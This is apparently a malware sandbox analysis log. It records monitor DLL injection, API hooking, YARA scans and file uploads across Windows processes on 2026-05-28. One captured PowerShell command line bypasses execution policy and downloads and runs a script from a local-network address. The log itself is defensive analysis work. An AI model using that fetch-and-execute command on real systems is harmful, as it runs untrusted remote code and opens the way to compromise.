2026-05-28 19:27:06,421 [root] DEBUG: 5148: DLL loaded at 0x00007FFE731B0000: C:\Windows\system32\DNSAPI (0xca000 bytes).
2026-05-28 19:27:06,422 [root] DEBUG: 5148: DLL loaded at 0x00007FFE19DE0000: C:\Windows\system32\domgmt (0x86000 bytes).
2026-05-28 19:27:06,425 [root] DEBUG: 5148: DLL loaded at 0x00007FFE752A0000: C:\Windows\System32\NSI (0x8000 bytes).
2026-05-28 19:27:06,432 [root] DEBUG: 5148: DLL loaded at 0x00007FFE64F60000: C:\Windows\System32\OneCoreCommonProxyStub (0x7f000 bytes).
2026-05-28 19:27:06,624 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:27:06,629 [root] DEBUG: Loader: Injecting process 5192 (thread 8316) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:06,630 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:27:06,630 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:06,632 [lib.api.process] INFO: Injected into 64-bit <Process 5192 WmiPrvSE.exe>
2026-05-28 19:27:06,634 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 5192
2026-05-28 19:27:06,634 [lib.api.process] INFO: Monitor config for process 5192: C:\c6kogbu7\dll\5192.ini
2026-05-28 19:27:06,635 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:27:06,878 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:27:06,883 [root] DEBUG: Loader: Injecting process 5192 (thread 8316) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:06,883 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2026-05-28 19:27:06,884 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:06,885 [lib.api.process] INFO: Injected into 64-bit <Process 5192 WmiPrvSE.exe>
2026-05-28 19:27:06,892 [root] DEBUG: 5192: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:27:06,892 [root] DEBUG: 5192: Interactive desktop enabled.
2026-05-28 19:27:06,893 [root] DEBUG: 5192: Dropped file limit defaulting to 100.
2026-05-28 19:27:06,894 [root] DEBUG: 5192: Disabling sleep skipping.
2026-05-28 19:27:06,894 [root] DEBUG: 5192: Services hook set enabled
2026-05-28 19:27:06,897 [root] DEBUG: 5192: YaraInit: Compiled rules loaded from existing file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:27:06,908 [root] DEBUG: 5192: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:27:06,909 [root] DEBUG: 5192: Monitor initialised: 64-bit capemon loaded in process 5192 at 0x00007FFE34DD0000, thread 8316, image base 0x00007FF65D570000, stack from 0x0000003E0A950000-0x0000003E0A960000
2026-05-28 19:27:06,909 [root] DEBUG: 5192: Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
2026-05-28 19:27:06,921 [root] DEBUG: 5192: Hooked 69 out of 69 functions
2026-05-28 19:27:06,925 [root] DEBUG: 5192: RestoreHeaders: Restored original import table.
2026-05-28 19:27:06,926 [root] INFO: Loaded monitor into process with pid 5192
2026-05-28 19:27:06,930 [root] DEBUG: 5192: DLL loaded at 0x00007FFE71C90000: C:\Windows\SYSTEM32\kernel.appcore (0x12000 bytes).
2026-05-28 19:27:06,930 [root] DEBUG: 5192: DLL loaded at 0x00007FFE743A0000: C:\Windows\System32\bcryptPrimitives (0x82000 bytes).
2026-05-28 19:27:06,932 [root] DEBUG: 5192: DLL loaded at 0x00007FFE76420000: C:\Windows\System32\clbcatq (0xa9000 bytes).
2026-05-28 19:27:06,935 [lib.api.process] INFO: Monitor config for process 3188: C:\c6kogbu7\dll\3188.ini
2026-05-28 19:27:06,936 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:27:06,938 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:27:06,942 [root] DEBUG: Loader: Injecting process 3188 with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:06,946 [root] DEBUG: 3188: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:27:06,947 [root] DEBUG: 3188: Disabling sleep skipping.
2026-05-28 19:27:06,948 [root] DEBUG: 3188: Interactive desktop enabled.
2026-05-28 19:27:06,948 [root] DEBUG: 3188: Dropped file limit defaulting to 100.
2026-05-28 19:27:06,949 [root] DEBUG: 3188: Services hook set enabled
2026-05-28 19:27:06,951 [root] DEBUG: 3188: YaraInit: Compiled rules loaded from existing file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:27:06,963 [root] DEBUG: 3188: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:27:06,963 [root] DEBUG: 3188: Monitor initialised: 64-bit capemon loaded in process 3188 at 0x00007FFE34DD0000, thread 14620, image base 0x00007FF7BE050000, stack from 0x00000067B01F4000-0x00000067B0200000
2026-05-28 19:27:06,964 [root] DEBUG: 3188: Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p
2026-05-28 19:27:06,977 [root] DEBUG: 3188: Hooked 69 out of 69 functions
2026-05-28 19:27:06,978 [root] INFO: Loaded monitor into process with pid 3188
2026-05-28 19:27:06,979 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2026-05-28 19:27:06,979 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:06,981 [lib.api.process] INFO: Injected into 64-bit <Process 3188 svchost.exe>
2026-05-28 19:27:07,090 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 14880: C:\Windows\System32\mousocoreworker.exe, ImageBase: 0x00007FF66ED00000
2026-05-28 19:27:07,091 [root] INFO: Announced 64-bit process name: MoUsoCoreWorker.exe pid: 14880
2026-05-28 19:27:07,092 [lib.api.process] INFO: Monitor config for process 14880: C:\c6kogbu7\dll\14880.ini
2026-05-28 19:27:07,093 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:27:07,095 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:27:07,100 [root] DEBUG: Loader: Injecting process 14880 (thread 14884) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:07,101 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:27:07,102 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:07,103 [lib.api.process] INFO: Injected into 64-bit <Process 14880 MoUsoCoreWorker.exe>
2026-05-28 19:27:07,104 [root] INFO: Announced 64-bit process name: MoUsoCoreWorker.exe pid: 14880
2026-05-28 19:27:07,104 [lib.api.process] INFO: Monitor config for process 14880: C:\c6kogbu7\dll\14880.ini
2026-05-28 19:27:07,105 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:27:07,107 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:27:07,111 [root] DEBUG: Loader: Injecting process 14880 (thread 14884) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:07,112 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:27:07,112 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:07,113 [lib.api.process] INFO: Injected into 64-bit <Process 14880 MoUsoCoreWorker.exe>
2026-05-28 19:27:07,120 [root] DEBUG: 14880: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:27:07,121 [root] DEBUG: 14880: Interactive desktop enabled.
2026-05-28 19:27:07,122 [root] DEBUG: 14880: Dropped file limit defaulting to 100.
2026-05-28 19:27:07,123 [root] DEBUG: 14880: VerifyCodeSection: Exception rebasing image from 0x00007FF66ED00000 to 0x0000000140000000.
2026-05-28 19:27:07,126 [root] DEBUG: 14880: Disabling sleep skipping.
2026-05-28 19:27:07,127 [root] DEBUG: 14880: YaraInit: Compiled rules loaded from existing file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:27:07,143 [root] DEBUG: 14880: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:27:07,143 [root] DEBUG: 14880: YaraScan: Scanning 0x00007FF66ED00000, size 0x1ad000
2026-05-28 19:27:07,153 [root] DEBUG: 14880: Monitor initialised: 64-bit capemon loaded in process 14880 at 0x00007FFE34DD0000, thread 14884, image base 0x00007FF66ED00000, stack from 0x000000D1A53F4000-0x000000D1A5400000
2026-05-28 19:27:07,154 [root] DEBUG: 14880: Commandline: C:\Windows\System32\mousocoreworker.exe -Embedding
2026-05-28 19:27:07,165 [root] DEBUG: 14880: hook_api: LdrpCallInitRoutine export address 0x00007FFE766E99BC obtained via GetFunctionAddress
2026-05-28 19:27:07,187 [root] WARNING: b'Unable to create trampoline for LockResource, hook type 2'
2026-05-28 19:27:07,187 [root] DEBUG: 14880: set_hooks: Unable to hook LockResource
2026-05-28 19:27:07,193 [root] DEBUG: 14880: Hooked 627 out of 628 functions
2026-05-28 19:27:07,203 [root] DEBUG: 14880: Syscall hook installed, syscall logging level 1
2026-05-28 19:27:07,207 [root] DEBUG: 14880: RestoreHeaders: Restored original import table.
2026-05-28 19:27:07,208 [root] INFO: Loaded monitor into process with pid 14880
2026-05-28 19:27:07,215 [root] DEBUG: 14880: caller_dispatch: Added region at 0x00007FF66ED00000 to tracked regions list (ntdll::NtAllocateVirtualMemory returns to 0x00007FF66EE1F712, thread 14884).
2026-05-28 19:27:07,216 [root] DEBUG: 14880: YaraScan: Scanning 0x00007FF66ED00000, size 0x1ad000
2026-05-28 19:27:07,229 [root] DEBUG: 14880: ProcessImageBase: Main module image at 0x00007FF66ED00000 unmodified (entropy change 0.000000e+00)
2026-05-28 19:27:07,232 [root] DEBUG: 14880: DLL loaded at 0x00007FFE71C90000: C:\Windows\SYSTEM32\kernel.appcore (0x12000 bytes).
2026-05-28 19:27:07,233 [root] DEBUG: 14880: DLL loaded at 0x00007FFE743A0000: C:\Windows\System32\bcryptPrimitives (0x82000 bytes).
2026-05-28 19:27:07,259 [root] DEBUG: 14880: CreateThreadBreakpoints: Failed to open thread and get a handle.
2026-05-28 19:27:07,276 [root] DEBUG: 14880: DLL loaded at 0x00007FFE76420000: C:\Windows\System32\clbcatq (0xa9000 bytes).
2026-05-28 19:27:07,297 [root] DEBUG: 14880: DLL loaded at 0x00007FFE60110000: C:\Windows\System32\usocoreps (0xd000 bytes).
2026-05-28 19:27:07,399 [root] DEBUG: 4712: DLL loaded at 0x00007FFE19130000: C:\Windows\System32\wscinterop (0x3d000 bytes).
2026-05-28 19:27:07,400 [root] DEBUG: 4712: DLL loaded at 0x00007FFE19130000: C:\Windows\System32\wscinterop (0x3d000 bytes).
2026-05-28 19:27:07,403 [root] DEBUG: 4712: DLL loaded at 0x00007FFE64440000: C:\Windows\System32\WSCAPI (0x4d000 bytes).
2026-05-28 19:27:07,403 [root] DEBUG: 4712: DLL loaded at 0x00007FFE64440000: C:\Windows\System32\WSCAPI (0x4d000 bytes).
2026-05-28 19:27:07,414 [root] DEBUG: 4712: DLL loaded at 0x00007FFE19110000: C:\Windows\System32\wscui.cpl (0x19000 bytes).
2026-05-28 19:27:07,414 [root] DEBUG: 4712: DLL loaded at 0x00007FFE19110000: C:\Windows\System32\wscui.cpl (0x19000 bytes).
2026-05-28 19:27:07,425 [root] DEBUG: 4712: DLL loaded at 0x00007FFE18FD0000: C:\Windows\System32\framedynos (0x52000 bytes).
2026-05-28 19:27:07,426 [root] DEBUG: 4712: DLL loaded at 0x00007FFE18FD0000: C:\Windows\System32\framedynos (0x52000 bytes).
2026-05-28 19:27:07,427 [root] DEBUG: 4712: DLL loaded at 0x00007FFE71A00000: C:\Windows\System32\wer (0xde000 bytes).
2026-05-28 19:27:07,428 [root] DEBUG: 4712: DLL loaded at 0x00007FFE71A00000: C:\Windows\System32\wer (0xde000 bytes).
2026-05-28 19:27:07,429 [root] DEBUG: 4712: DLL loaded at 0x00007FFE19030000: C:\Windows\System32\werconcpl (0xde000 bytes).
2026-05-28 19:27:07,430 [root] DEBUG: 4712: DLL loaded at 0x00007FFE19030000: C:\Windows\System32\werconcpl (0xde000 bytes).
2026-05-28 19:27:07,440 [root] DEBUG: 4712: DLL loaded at 0x00007FFE18FB0000: C:\Windows\System32\hcproviders (0x14000 bytes).
2026-05-28 19:27:07,441 [root] DEBUG: 4712: DLL loaded at 0x00007FFE18FB0000: C:\Windows\System32\hcproviders (0x14000 bytes).
2026-05-28 19:27:07,450 [root] DEBUG: 4712: DLL loaded at 0x00007FFE18EC0000: C:\Windows\System32\ieproxy (0xee000 bytes).
2026-05-28 19:27:07,451 [root] DEBUG: 4712: DLL loaded at 0x00007FFE18EC0000: C:\Windows\System32\ieproxy (0xee000 bytes).
2026-05-28 19:27:07,498 [root] DEBUG: 14880: DLL loaded at 0x00007FFE6ED00000: C:\Windows\System32\WINHTTP (0x10a000 bytes).
2026-05-28 19:27:07,499 [root] DEBUG: 14880: DLL loaded at 0x00007FFE73B30000: C:\Windows\System32\DPAPI (0xa000 bytes).
2026-05-28 19:27:07,500 [root] DEBUG: 14880: DLL loaded at 0x00007FFE19240000: C:\Windows\System32\UPShared (0xb2000 bytes).
2026-05-28 19:27:07,506 [root] DEBUG: 14880: DLL loaded at 0x00007FFE5C940000: C:\Windows\System32\wuapi (0xf0000 bytes).
2026-05-28 19:27:07,507 [root] DEBUG: 14880: DLL loaded at 0x00007FFE5B130000: C:\Windows\SYSTEM32\wups (0x1a000 bytes).
2026-05-28 19:27:07,510 [root] DEBUG: 14880: DLL loaded at 0x00007FFE6FA60000: C:\Windows\SYSTEM32\wtsapi32 (0x14000 bytes).
2026-05-28 19:27:07,511 [root] DEBUG: 14880: DLL loaded at 0x00007FFE73A70000: C:\Windows\System32\WINSTA (0x5b000 bytes).
2026-05-28 19:27:07,567 [root] DEBUG: 14880: api-rate-cap: NtReadFile hook disabled due to rate
2026-05-28 19:27:07,594 [root] DEBUG: 14880: DLL loaded at 0x00007FFE5B130000: C:\Windows\System32\wups (0x1a000 bytes).
2026-05-28 19:27:08,990 [root] DEBUG: 5192: DLL loaded at 0x00007FFE5C5C0000: C:\Windows\system32\wbem\wbemprox (0x11000 bytes).
2026-05-28 19:27:08,993 [root] DEBUG: 5192: DLL loaded at 0x00007FFE5C200000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2026-05-28 19:27:09,000 [root] DEBUG: 5192: DLL loaded at 0x00007FFE67DF0000: C:\Windows\system32\wbem\wmiutils (0x28000 bytes).
2026-05-28 19:27:09,008 [root] DEBUG: 5192: DLL loaded at 0x00007FFE73C10000: C:\Windows\SYSTEM32\powrprof (0x4b000 bytes).
2026-05-28 19:27:09,009 [root] DEBUG: 5192: DLL loaded at 0x00007FFE18FD0000: C:\Windows\SYSTEM32\framedynos (0x52000 bytes).
2026-05-28 19:27:09,009 [root] DEBUG: 5192: DLL loaded at 0x00007FFE189A0000: C:\Windows\system32\wbem\cimwin32 (0x20c000 bytes).
2026-05-28 19:27:09,010 [root] DEBUG: 5192: DLL loaded at 0x00007FFE73BF0000: C:\Windows\SYSTEM32\UMPDC (0x12000 bytes).
2026-05-28 19:27:09,016 [root] DEBUG: 5192: DLL loaded at 0x000001C9F1AD0000: C:\Windows\SYSTEM32\WMI (0x3000 bytes).
2026-05-28 19:27:09,017 [root] DEBUG: 5192: DLL loaded at 0x00007FFE6E960000: C:\Windows\SYSTEM32\wmiclnt (0x11000 bytes).
2026-05-28 19:27:09,018 [root] DEBUG: 5192: CreateThreadBreakpoints: Failed to open thread and get a handle.
2026-05-28 19:27:09,553 [root] DEBUG: 14880: api-rate-cap: NtClose hook disabled due to rate
2026-05-28 19:27:10,352 [root] DEBUG: 4712: api-rate-cap: LdrpCallInitRoutine hook disabled due to rate
2026-05-28 19:27:11,431 [root] INFO: Process with pid 5148 has terminated
2026-05-28 19:27:11,433 [root] DEBUG: 5148: NtTerminateProcess hook: Attempting to dump process 5148
2026-05-28 19:27:11,433 [root] DEBUG: 5148: DoProcessDump: Skipping process dump as code is identical on disk.
2026-05-28 19:27:11,865 [root] DEBUG: 14880: DLL loaded at 0x00007FFE72E40000: C:\Windows\System32\msvcp110_win (0x8a000 bytes).
2026-05-28 19:27:11,866 [root] DEBUG: 14880: DLL loaded at 0x00007FFE6E1D0000: C:\Windows\SYSTEM32\policymanager (0xa1000 bytes).
2026-05-28 19:27:11,871 [root] DEBUG: 14880: DLL loaded at 0x00007FFE19E40000: C:\Windows\System32\usoapi (0x26000 bytes).
2026-05-28 19:27:11,872 [root] DEBUG: 14880: DLL loaded at 0x00007FFE5D170000: C:\Windows\System32\FlightSettings (0xe6000 bytes).
2026-05-28 19:27:11,875 [root] DEBUG: 14880: DLL loaded at 0x00007FFE5FFA0000: C:\Windows\System32\Windows.Networking.Connectivity (0xb9000 bytes).
2026-05-28 19:27:11,878 [root] DEBUG: 14880: DLL loaded at 0x00007FFE6C120000: C:\Windows\System32\npmproxy (0x10000 bytes).
2026-05-28 19:27:11,883 [root] DEBUG: 14880: DLL loaded at 0x00007FFE70740000: C:\Windows\System32\WinTypes (0x155000 bytes).
2026-05-28 19:27:11,888 [root] DEBUG: 14880: DLL loaded at 0x00007FFE5BE10000: C:\Windows\SYSTEM32\productenumerator (0xe000 bytes).
2026-05-28 19:27:12,180 [root] INFO: Stopping Task Scheduler Service
2026-05-28 19:27:12,191 [root] INFO: Stopped Task Scheduler Service
2026-05-28 19:27:12,195 [root] INFO: Starting Task Scheduler Service
2026-05-28 19:27:12,203 [root] INFO: Started Task Scheduler Service
2026-05-28 19:27:12,204 [lib.api.process] INFO: Monitor config for process 1248: C:\c6kogbu7\dll\1248.ini
2026-05-28 19:27:12,206 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:27:12,209 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:27:12,214 [root] DEBUG: Loader: Injecting process 1248 with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:12,216 [root] DEBUG: 1248: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:27:12,218 [root] DEBUG: 1248: Disabling sleep skipping.
2026-05-28 19:27:12,218 [root] DEBUG: 1248: Interactive desktop enabled.
2026-05-28 19:27:12,219 [root] DEBUG: 1248: Dropped file limit defaulting to 100.
2026-05-28 19:27:12,220 [root] DEBUG: 1248: Services hook set enabled
2026-05-28 19:27:12,221 [root] DEBUG: 1248: YaraInit: Compiled rules loaded from existing file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:27:12,233 [root] DEBUG: 1248: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:27:12,234 [root] DEBUG: 1248: Monitor initialised: 64-bit capemon loaded in process 1248 at 0x00007FFE34DD0000, thread 15580, image base 0x00007FF7BE050000, stack from 0x0000002A1C5F4000-0x0000002A1C600000
2026-05-28 19:27:12,234 [root] DEBUG: 1248: Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
2026-05-28 19:27:12,247 [root] DEBUG: 1248: Hooked 69 out of 69 functions
2026-05-28 19:27:12,249 [root] INFO: Loaded monitor into process with pid 1248
2026-05-28 19:27:12,250 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2026-05-28 19:27:12,250 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:12,252 [lib.api.process] INFO: Injected into 64-bit <Process 1248 svchost.exe>
2026-05-28 19:27:14,256 [root] DEBUG: 14880: DLL loaded at 0x00007FFE6F1B0000: C:\Windows\System32\taskschd (0xac000 bytes).
2026-05-28 19:27:14,293 [root] INFO: Announced starting service "b'WaaSMedicSvc'"
2026-05-28 19:27:15,208 [root] INFO: Added new file to list with pid 12824 and path C:\Users\admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
2026-05-28 19:27:15,223 [root] DEBUG: 12824: CreateProcessHandler: Injection info set for new process 15728: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ImageBase: 0x00007FF7D7D40000
2026-05-28 19:27:15,224 [root] INFO: Announced 64-bit process name: powershell.exe pid: 15728
2026-05-28 19:27:15,225 [lib.api.process] INFO: Monitor config for process 15728: C:\c6kogbu7\dll\15728.ini
2026-05-28 19:27:15,226 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:27:15,325 [root] DEBUG: 14880: DLL loaded at 0x00007FFE355E0000: C:\Windows\system32\WaaSMedicPS (0xc000 bytes).
2026-05-28 19:27:15,440 [lib.common.results] INFO: Uploading file C:\ProgramData\USOPrivate\UpdateStore\store.db-journal to files\1c00683529e352d0220e4986427954c623b30c9b1ab27d7b58e3c5a81f00a9ad; Size is 8720; Max size: 100000000
2026-05-28 19:27:15,460 [lib.common.results] INFO: Uploading file C:\ProgramData\USOPrivate\UpdateStore\store.db-journal to files\b7542203a7b392fd83b7f24a5f897c1c6795f68c6edad4ea35d92bfb69746ac4; Size is 8720; Max size: 100000000
2026-05-28 19:27:15,482 [lib.common.results] INFO: Uploading file C:\ProgramData\USOPrivate\UpdateStore\store.db-journal to files\9f0e7534020cf9a139e6838ddf9f2fe29062dfff1d89f84dacd214e525fcd7cd; Size is 8720; Max size: 100000000
2026-05-28 19:27:15,508 [lib.common.results] INFO: Uploading file C:\ProgramData\USOPrivate\UpdateStore\store.db-journal to files\127d342d939b23dda182eb7b094e9bfe2459abb7ed580fcc973fe7d93b8d4e4c; Size is 8720; Max size: 100000000
2026-05-28 19:27:15,529 [lib.common.results] INFO: Uploading file C:\ProgramData\USOPrivate\UpdateStore\store.db-journal to files\99d90ec863cccf092787ca9688ff15b3378072d8002aefd8ea24fcf3990d9c7c; Size is 8720; Max size: 100000000
2026-05-28 19:27:15,582 [lib.common.results] INFO: Uploading file C:\ProgramData\USOPrivate\UpdateStore\store.db-journal to files\1fb559eb17416adc5965588c578d30b0134e7346e5f20a13beda3a2715808409; Size is 12824; Max size: 100000000
2026-05-28 19:27:15,675 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:27:15,680 [root] DEBUG: Loader: Injecting process 15728 (thread 15732) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:15,681 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:27:15,681 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:15,683 [lib.api.process] INFO: Injected into 64-bit <Process 15728 powershell.exe>
2026-05-28 19:27:15,685 [root] INFO: Announced 64-bit process name: powershell.exe pid: 15728
2026-05-28 19:27:15,686 [lib.api.process] INFO: Monitor config for process 15728: C:\c6kogbu7\dll\15728.ini
2026-05-28 19:27:15,686 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:27:16,118 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:27:16,123 [root] DEBUG: Loader: Injecting process 15728 (thread 15732) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:16,124 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2026-05-28 19:27:16,124 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:16,125 [lib.api.process] INFO: Injected into 64-bit <Process 15728 powershell.exe>
2026-05-28 19:27:16,131 [root] DEBUG: 15728: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:27:16,132 [root] DEBUG: 15728: Interactive desktop enabled.
2026-05-28 19:27:16,133 [root] DEBUG: 15728: Dropped file limit defaulting to 100.
2026-05-28 19:27:16,135 [root] DEBUG: 15728: Disabling sleep skipping.
2026-05-28 19:27:16,136 [root] DEBUG: 15728: YaraInit: Compiled rules loaded from existing file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:27:16,147 [root] DEBUG: 15728: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:27:16,148 [root] DEBUG: 15728: YaraScan: Scanning 0x00007FF7D7D40000, size 0x7caba
2026-05-28 19:27:16,150 [root] DEBUG: 15728: Monitor initialised: 64-bit capemon loaded in process 15728 at 0x00007FFE34DD0000, thread 15732, image base 0x00007FF7D7D40000, stack from 0x0000006CF0534000-0x0000006CF0540000
2026-05-28 19:27:16,151 [root] DEBUG: 15728: Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c "iwr http://192.168.1.1:9000/test-serial.ps1 | iex"
2026-05-28 19:27:16,162 [root] DEBUG: 15728: hook_api: LdrpCallInitRoutine export address 0x00007FFE766E99BC obtained via GetFunctionAddress
2026-05-28 19:27:16,186 [root] WARNING: b'Unable to create trampoline for LockResource, hook type 2'
2026-05-28 19:27:16,187 [root] DEBUG: 15728: set_hooks: Unable to hook LockResource
2026-05-28 19:27:16,193 [root] DEBUG: 15728: Hooked 627 out of 628 functions
2026-05-28 19:27:16,196 [root] DEBUG: 15728: Syscall hook installed, syscall logging level 1
2026-05-28 19:27:16,201 [root] DEBUG: 15728: RestoreHeaders: Restored original import table.
2026-05-28 19:27:16,202 [root] INFO: Loaded monitor into process with pid 15728
2026-05-28 19:27:16,204 [root] DEBUG: 15728: caller_dispatch: Added region at 0x00007FF7D7D40000 to tracked regions list (kernel32::SetUnhandledExceptionFilter returns to 0x00007FF7D7D44D21, thread 15732).
2026-05-28 19:27:16,205 [root] DEBUG: 15728: YaraScan: Scanning 0x00007FF7D7D40000, size 0x7caba
2026-05-28 19:27:16,209 [root] DEBUG: 15728: ProcessImageBase: Main module image at 0x00007FF7D7D40000 unmodified (entropy change 0.000000e+00)
2026-05-28 19:27:16,215 [root] DEBUG: 15728: DLL loaded at 0x00007FFE5B350000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0xaa000 bytes).
2026-05-28 19:27:16,219 [root] DEBUG: 15728: DLL loaded at 0x00007FFE71C90000: C:\Windows\SYSTEM32\kernel.appcore (0x12000 bytes).
2026-05-28 19:27:16,220 [root] DEBUG: 15728: DLL loaded at 0x00007FFE5D810000: C:\Windows\SYSTEM32\VERSION (0xa000 bytes).
2026-05-28 19:27:16,223 [root] DEBUG: 15728: DLL loaded at 0x00007FFE1BFE0000: C:\Windows\SYSTEM32\ucrtbase_clr0400 (0xbd000 bytes).
2026-05-28 19:27:16,223 [root] DEBUG: 15728: DLL loaded at 0x00007FFE5C060000: C:\Windows\SYSTEM32\VCRUNTIME140_CLR0400 (0x16000 bytes).
2026-05-28 19:27:16,225 [root] DEBUG: 15728: DLL loaded at 0x00007FFE1AE50000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr (0xb34000 bytes).
2026-05-28 19:27:16,260 [root] DEBUG: 15728: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBBA20000, size: 0x1000.
2026-05-28 19:27:16,266 [root] DEBUG: 15728: hook_api: clrjit::compileMethod export address 0x00007FFE1BE95FF0 obtained via GetFunctionAddress
2026-05-28 19:27:16,266 [root] DEBUG: 15728: DLL loaded at 0x00007FFE1BE90000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit (0x14f000 bytes).
2026-05-28 19:27:16,269 [root] DEBUG: 15728: .NET JIT native cache at 0x00007FFDBBA20000: scans and dumps active.
2026-05-28 19:27:16,270 [root] DEBUG: 15728: AllocationHandler: Adding allocation to tracked region list: 0x00007DF45B5B0000, size: 0xa0000.
2026-05-28 19:27:16,270 [root] DEBUG: 15728: GetEntropy: Error - Supplied address inaccessible: 0x00007DF45B5B0000
2026-05-28 19:27:16,273 [root] DEBUG: 15728: AllocationHandler: Processing previous tracked region at: 0x00007FFDBBA20000.
2026-05-28 19:27:16,274 [root] DEBUG: 15728: ProcessTrackedRegion: Entropy for tracked region at 0x00007FFDBBA20000: 5.804962e+00
2026-05-28 19:27:16,275 [root] DEBUG: 15728: DumpPEsInRange: Scanning range 0x00007FFDBBA20000 - 0x00007FFDBBA2741D.
